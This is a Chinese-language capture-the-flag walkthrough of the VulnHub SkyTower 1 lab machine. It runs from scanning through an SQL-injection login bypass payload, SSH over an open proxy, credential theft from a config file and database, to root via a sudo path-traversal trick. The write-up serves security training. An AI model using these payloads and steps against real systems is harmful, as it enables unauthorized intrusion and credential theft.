下载

下载地址：https://www.vulnhub.com/entry/skytower-1,96/

导入靶机

解压发现是VirtualBox格式的，下载一个VirtualBox：Downloads – Oracle VirtualBox

选择解压后的vbox文件，然后点击左上角管理

点击导出虚拟电脑，选中后下一步更改路径，然后一直下一步

就得到了一个iso镜像文件，用vmware打开

修改网络模式为 nat 模式

信息收集

主机发现

arp-scan -l

发现主机是 192.168.109.177

端口扫描

nmap -p- 192.168.109.177

发现开启了22、80、3128端口

目录扫描

python3 dirsearch.py -u "192.168.109.177" -x 403

只有一个 login.php

访问 web

发现只有一个登陆框，我们随便输一个邮箱，然后密码用万能密码

123'|| 1=1 #

登录成功，发现了默认用户和密码

get shell

尝试使用ssh连接

ssh john@192.168.109.177

连接不上，想起来还开放了一个3128端口，可能是ssh的代理端口，我们挂上代理试试

vim /etc/proxychains4.conf

proxychains ssh john@192.168.109.177 -t "/bin/sh"

连接成功

权限提升

sudo -l

发现没权限，登录时发现 login.php 存在sql注入，查看一下

cat /var/www/login.php

发现了数据库账号和密码

登录数据库

mysql -u root SkyTech -p

查看 MySQL 中的数据库

show databases;

使用 SKyTech 数据库

use SkyTech;
show tables;

查看表

select * from login;

ssh用sara用户连接

proxychains ssh sara@192.168.109.177 -t "/bin/sh"

查看权限

sudo -l

发现 /accounts/* 有权限

pwd
cd ../../
ls

发现accounts在根目录下，利用 accounts/ 有权限，查看 root 目录下有什么

sudo ls /accounts/../root
sudo cat /accounts/../root

发现 root的密码为 theskytower

再次ssh连接root用户

proxychains ssh root@192.168.109.177 -t "/bin/sh"

提权成功